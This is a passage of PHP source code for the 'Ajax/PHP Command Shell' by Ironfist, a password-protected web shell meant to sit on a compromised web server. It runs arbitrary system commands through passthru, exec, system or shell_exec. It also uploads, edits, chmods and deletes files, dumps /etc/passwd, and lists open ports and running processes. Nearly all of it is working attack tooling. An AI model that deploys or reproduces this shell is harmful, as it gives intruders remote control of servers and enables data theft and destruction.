'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' => "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = ''; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '
Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "
I can write to this directory"; } else { print "
I can't write to this directory, please choose another one."; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print 'Ajax/PHP Command Shell © By Ironfist The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re not used to these commands, google a little. Custom Functions If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains \'func name\' => \'javascript function\'. Take a look at the built-in functions for examples. I know this readme isn\'t providing too much information, but hell, does this shell even require one :P - Iron '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "

"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.
"; if(function_exists(passthru)) { print "Passthru: Enabled
"; } else { print "Passthru: Disabled
"; } if(function_exists(exec)) { print "Exec: Enabled
"; } else { print "Exec: Disabled
"; } if(function_exists(system)) { print "System: Enabled
"; } else { print "System: Disabled
"; } if(function_exists(shell_exec)) { print "Shell_exec: Enabled
"; } else { print "Shell_exec: Disabled
"; } print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; if( ini_get('safe_mode') ){ print "Safe Mode: Enabled"; } else { print "Safe Mode: Disabled"; } print "

Open_basedir will block access to some files you shouldn't access.
"; if( ini_get('open_basedir') ){ print "Open_basedir: Enabled"; } else { print "Open_basedir: Disabled"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."
"; print ""; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "
DirectoriesFiles
"; foreach($dirs as $directory) { print "[D][W]".$directory."
"; } print "
"; foreach($filez as $file) { print "[D]".$file."
"; } print "
"; } } elseif(strtolower($cmd) == "about") { print "Ajax Command Shell by Ironfist.
Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."
"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> Command Shell ~ <?php print getenv("HTTP_HOST"); ?>

Quick Commands
$execute) { print ' 
'; } ?>
Command history

About

Ajax/PHP Command Shell
by Ironfist
Version


Thanks to everyone @ SharePlaza
milw0rm
and special greetings to everyone in rootshell
[Execute command] [Upload file] [Change directory] [Filebrowser] [Create File]
   
Command:
You are not logged in, please login.
Password:
"; } ?>